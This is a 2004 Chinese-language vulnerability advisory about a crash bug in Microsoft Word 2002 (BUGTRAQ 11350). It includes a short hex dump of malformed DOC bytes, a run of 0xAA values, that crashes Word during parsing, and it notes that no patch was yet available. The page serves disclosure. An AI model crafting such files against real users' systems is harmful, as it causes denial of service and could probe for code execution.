发布日期：2004-10-07
更新日期：2004-10-09

受影响系统：

Microsoft Word 2002 SP3
Microsoft Word 2002 SP2
Microsoft Word 2002 SP1
Microsoft Word 2002

描述：

---

BUGTRAQ  ID: 11350

MS Word是流行的文字编辑软件。

MS Word在处理部分畸形DOC文件时存在问题，攻击者可以利用这个漏洞使应用程序崩溃。

构建如下的doc文件，如下所示，第3行多个0xAA字符，或者修改第二行和第三行部分数据，可导致MS WORD在解析时崩溃：

00001400:  14 00 0F 00 12 00 01 00  9C 00 0F 00 03 00 00 00  ................
00001410:  00 00 00 00 00 00 40 00  00 40 F1 FF 02 00 40 00  ................
00001420:  AA AA AA AA AA AA AA AA  AA AA AA AA 4E 00 6F 00  ............N.o.
00001430:  72 00 6D 00 61 00 6C 00  00 00 02 00 00 00 18 00  r.m.a.l.........

目前还不清楚是否可用于执行任意指令。

<*来源：vuln@hexview.com （vuln@hexview.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=109716247230733&w=2
*>

建议：

---

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/technet/security/

浏览次数：2783
严重程度：0（网友投票）